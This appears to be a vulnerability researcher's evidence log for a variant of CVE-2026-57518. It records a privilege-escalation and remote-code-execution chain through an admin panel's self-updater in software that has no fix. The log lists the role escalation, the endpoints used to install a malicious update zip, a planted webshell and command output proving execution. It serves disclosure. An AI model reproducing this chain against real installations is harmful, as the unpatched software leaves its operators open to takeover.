=== CVE-2026-57518 VARIANT Evidence (UpdateController self-updater RCE) === Date: Sun Jul 5 14:07:57 UTC 2026 --- Variant summary --- Alternate RCE sink: UpdateController (/admin/system/update) via the 'system: software updates' permission, reached through the SAME saveAction privilege-escalation root cause (only blocks Administrator role id=3). --- Step 3: Privilege Escalation --- Editor user ID: 2 Updater role ID: 4 (system: software updates + system: access admin area) User Manager role ID: 5 (user: manage users) Editor roles after escalation: "roles":[2,4] --- Step 5/6: Variant sink --- Download endpoint: POST /admin/system/update/download (url=file://...evil_update.zip) Update endpoint: POST /admin/system/update/update (SelfUpdater::update) Webshell on disk: yes --- Step 7: RCE --- Webshell URL: /rce_variant.php?cmd=id id output: uid=33(www-data) gid=33(www-data) groups=33(www-data) whoami output: www-data --- Fixed version --- no-fixed-version (release ZIP; 1.0.18 is final release, project archived)